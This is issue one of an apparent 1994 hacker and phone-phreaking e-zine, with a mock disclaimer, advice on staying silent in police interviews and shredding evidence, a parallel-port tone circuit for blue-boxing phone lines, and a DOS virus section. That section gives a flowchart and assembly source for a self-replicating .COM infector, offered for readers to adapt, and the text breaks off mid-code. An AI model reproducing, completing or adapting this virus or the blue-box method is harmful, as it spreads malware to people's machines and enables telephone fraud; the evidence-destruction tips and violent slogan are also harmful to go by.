,--------. | | __ __ | ,----' |__| ,--. |__| | | | |_ | | ,--. | | ,--.--. ,-----. ,-----. ,--. ,-----. | | | | | ,-' | __, | ,-. | | ,-. | | | | ,---' | `----. | | | | | | | | | | | | | | | | | | | | | | | +--. | | | `-' | | | | | | | | +---. `--------' `--' `-----' `--' `-----' `-' `-' `--' `-----' August '94 JJ JJ LL JJ oOOOOo UU UU R rRR nNNNNn aAAAAAa LL JJ OO OO UU UU RR NN NN AA AA LL jJ OO OO UU UU RR NN NN AA AA LL JJJJJJ OOooOO uUUUUu RR NN NN aAAAAAAa lLLLL Number One Citronic Journal is a 'Cyberspace' Free Zone Citronic are Equal Opportunities Employers €iÂr0üi› - Citronic - €iÂr0üi› - Citronic - €iÂr0üi› - Citronic - €iÂr0üi› ----> |-|ar|)c0r3 T3cH|\|0pHi11iAcZ <---- +--------------------------Contents-------------------------+ | | | 1) This bit | | 2) DisKlaimer | | 3) Messages from Dah Krew | | 4) Getting Nicked ! | | 5) DAC Plans | | 6) A Simple DOS Virus | | 7) Speed/Whiz Recipe | | 8) Maelstrom/Terminal Boredom Bust | | 9) Joining Citronic | | 10) Trashing BT | 11) Dah Last Bit | | | +-----------------------------------------------------------+ "If in doubt - Shoot a Fascist" €iÂr0üi› - Citronic - €iÂr0üi› - Citronic - €iÂr0üi› - Citronic - €iÂr0üi› an119774@anon.penet.fi an119774@anon.penet.fi an119774@anon.penet.fi |)izc1aim3r ~~~~~~~~~~~ If anyone does any of the stuff mentioned in this file there is a possibility of getting busted and being put in jail forever. If this happens don't come whining to us 'cos we'll deny everything and act real innocent. Also any wars in small third world states are nothing to do with us. Everything in here is for informational purposes only and anything carried out is entirely at your own risk. M3sS4g3z Fr0m |)ah |Cos they kick ass< Meeko >Midnight BT Engineer< Mini-master >Pascal wiz :-)))))) < BadS >London phone dewd and Phreqbot sysop< Maelstrom >Not only a 3l33t haq/phreak but a bloody good bloke< Phantasm >Sysop of UA BBS - kEwl !!!< THC >We WILL meet sometime< Aristotle >hArDc0rE virus d00d!< Grim Reefer >It was a pleasure to pass out in your house!< +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+ Getting Nicked ~~~~~~~~~~~~~~ or what to do when you're arrested... Did you know over 70% of all convictions are made on the basis of what was said in the interview. What does this mean practically ?? WHEN TALKED TO ---> SHUT UP Yep that's it. I know this is going to be mind-blastingly hard, especially for Phreaks who have an innate ability to talk constantly. But hopefully the lack of a telephone in the vicinity may keep you quiet. You simply answer 'No Comment' to *ANY* interview questions asked. Also the Police may start chatting to you informally when you're in the police car/holding cell/police custody cell/anywhere else. Don't give them any information that can help them. This means basically shutting up and answering only stuff such as you're name, address and other such formalities. They can't use this idle chat as evidence against you, but if they think you're innocent then they're gonna stop looking for evidence but if you say 'Yeah I did it copper and you can't prove nuthin' 'cos this aint recorded ha ha ha !' the're gonna keep looking until they find something. Answering 'No Comment' as a reply to an interview question is not an admission of guilt. If you're case goes to trial the interview tape will be played, and if you answer 'No Comment' to a question it's as if the question had not been asked. The prosecution cannot base anything on the fact you did not wish to answer the question. Another ploy the police will use is the bribery tactic... i.e. 'We have you're mates and they all said you did it - so unless you tell us something you're going down forever' - again no comment, this is a ploy just to get you to talk. Ratting on yer mates because they're gonna let you off easier is not only likely to get you lynched as soon as you walk out the door, but it also won't work, so don't try it. Also they will try and outrage you into defending yourself i.e. 'You have broken into Government computers and have defrauded more then 50,000 quids worth of stuff haven't you ??'. This is another ploy to make you go 'No way I haven't done anything like that!' - bite your tongue, they will simply try to get you talking. Being in a police cell is a completely miserable experience and being told 'If you tell us something you can be on the next bus outta here' is an extremely attractive prospect after being locked up in a 6x4 room for 8 hours. But all these are all cunning psychological tricks used to get convictions (after all this is what they're paid for). And finally... You have been bright enough to PGP encrypt all your sensitive info with a 1024 bit key and a bloody long password haven't you ??? And you have completely shredded all unwanted dodgy stuff haven't you ?? (Yeah, not just deleted - electronically SHREDDED). It might be worth mentioning that if you're HD is compressed with Stacker or any other compression utility then its almost impossible to completly erase deleted files by writing over them.... This advice is not just stuff from the top of my head. It's from experience - bitter experience. The bright thing to do is not to get nicked in the first place either by:- a) Not breaking the law b) Having half a brain and not getting caught Freedom and Good Karma '94 HarLeQuin +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+ Plans for a Digital -> Audio Convertor ~~~~~~~~~~~~~~~~~~~~~~~~~~ Some of you poorer phreaks may have noticed blue boxing is pretty impossible without a soundcard for your beloved PC or without being able to solder a circuit without burning your ear with the soldering iron. Anyway, this is a very simple circuit that produces perfect tones. Although it isn't new or cutting edge, its been included in Citronic for convenience sake, as when I was looking for it (quite some time ago) I couldn't find the circuit diagram anywhere. This will cost you a couple of quid/few dollars so is very cheap. When its built, attach it to your parallel port. Please note: the output has to be attached to an amplifier. My CD player works perfectly for this, most stereos will do. This circuit requires: 9 x 20K resistors 9 x 10K resistors 1 x 100 MFD capacitor 25 pin DShell plug All the resitors are 1/4 watt and 1% tolerance. Make sure these are exact as the first DAC I built had 5% tolerance resistors and was crap. You might also want to add a female RCA plug to have a convenient way to connect it to an amplifier. The entire circuit can be built on the back of the 25 pin plug. Be sure to connect the two points labeled 0v. No power supply is required. This circuit was included in an Amiga mod file player package by Mark J. Cox. He acknowledges Harry Stox for the circuit. Printer Port: signal pin 20k 20k D0 2 >ÄÄÄ°°°ÄÂÄ°°°ÄÄ0v 20k ° 10k D1 3 >ÄÄÄ°°°Ä´ 20k ° 10k D2 4 >ÄÄÄ°°°Ä´ 20k ° 10k D3 5 >ÄÄÄ°°°Ä´ 20k ° 10k D4 6 >ÄÄÄ°°°Ä´ 20k ° 10k D5 7 >ÄÄÄ°°°Ä´ 20k ° 10k D6 8 >ÄÄÄ°°°Ä´ 20k ° 10k D7 9 >ÄÄÄ°°°Ä´ 20k ° 10k 100 MFD ÃÄÄÄÄÄÄ´ÛÄÄÄÄ> TO AMPLIFIER ° 10k GND 20 >ÄÄÄÄÄÄÄÅÄÄÄÄÄÄÄÄÄÄÄÄ> 0v Almost my entire phreaking career was using this device so it does work ! I recommend BlueDial software, its free and supports DACs. The current version at the time of writing is BDial v 6.1 Also there is alot of software around that lets you play/edit Amiga .MOD filez thru a DAC (just in case you're interested) +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+ The Fade Virus A Simple Dos Virus ~~~~~~~~~~~~~~~~~~ Viruses are usually ignored by hackers as 'novelties' or 'toys' but in fact they can be extremely useful. Especially when attacking DOS based network systems such as Novel. They are also an excellent way to learn assembly language (for any platform) as you can go from very simple viruses to extremely complicated ones that require a working knowledge of the platform, whether documented or not. They are also an artform, check out some of NuKE's/Phalcon Skism's work for some excellent examples. Any common criminal with a copy of FORMAT can cause damage. Get creative - destructive viruses get a lame rating of 99. 8% Finally, if you want to get into this virus thing, check out #virus on IRC or Aristotle's BBS, Black Axis on (804) 599-4152. 40HEX magazine (by Skism/Phalcon) and NuKE Info Journals are a mine of information, if you can get hold of them. Anyway, I have included a totally original, very simple virus I wrote some time ago. I made it as simple as possible so it's easy to learn from and adapt. It's easily modified and very easy to understand. So have a play around with it and see what you can come up with. *************************************** * * * Flowchart for the FADE Mk I virus * * * *************************************** [FADE Mk I] | [get length of host from ] [jmp at beginning of file] [ and PUSH to stack ] | [find first *.COM file]-->----file not found--------------+ | | file|found | | | [open file]<------------file found--------------+ | | | | [read 5 bytes to read_buf] | | | | | [check bytes for virus tag]->---tag found-----+ | | | | | | | [close file] | | | | | | | [find next *.COM]->+ | | | | | [file not|found] | | | | |<-------------------[set non_found_switch]<---+ | [move 5 original host_bytes ] [back to begining of program] | [move read_buf to host_bytes] | [non_found_switch present ?]->--yes-------+ | | n|o | | | [get file length from DTA] | [ and put into jmp_inst ] | | | [write tag+jmp_inst to] | [ begining of file ] | | | [write rest of virus] | [ to end of file ] | | | [close file]<---------------------+ | [execute host program] -----CUT HERE----- ;************************************************************************* ;* * ;* The [FADE] Virus Mk Ia * ;* A Simple 179 byte parasitic .COM infector * ;* by * ;* HarLeQuin * ;* * ;************************************************************************* ; 179 bytes long ; Parasitic Non-Resident .COM infector ; Compiled with A86 ; Offsets to data, negative from end of host sp_off EQU 16 ; file spec '*.COM',0 offset inf_off EQU 10 ; infect tag offset jmp_off EQU 8 ; jmp instruction offset host_off EQU 5 ; host bytes offset vir_length EQU 194-15 ; Length of active virus code db 90h,0F8h ; nop,clc - virus infection tag jmp start ;--------------------------- Original Program ---------------------------- db 90h,90h,90h,90h,90h,90h,90h,90h,0CDh,20h ;--------------------------- Original Program ---------------------------- start: mov ax,[103h] ; Put jmp length into ax add ax,105h ; plus offset of ORG and tag+jmp mov cl,8 ; 8 Loops push_labl: ; Rather than POP then PUSH every time push ax ; Put OFFSET start on stack loop push_labl ; Do it again find_first: mov ah,4Eh ; Find first file xor cx,cx ; with any attributes pop dx ; get start address add dx,vir_length-sp_off ; that matches *.COM int 21h ; Dispatch jc non_found_switch ; If none found execute host program open_file: mov ax,3D02h ; Open file using handle, read/write privs mov dx,9Eh ; address of filename in DTA int 21h ; Dispatch mov bx,ax